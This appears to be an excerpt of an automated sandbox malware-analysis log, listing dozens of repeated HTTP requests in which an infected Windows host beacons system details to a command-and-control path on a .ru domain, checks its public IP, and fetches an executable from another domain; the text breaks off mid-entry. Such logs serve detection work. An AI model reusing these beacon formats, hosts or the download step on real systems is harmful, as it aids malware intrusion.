Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: GET /f44.exe HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sturtevantforcongress.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ 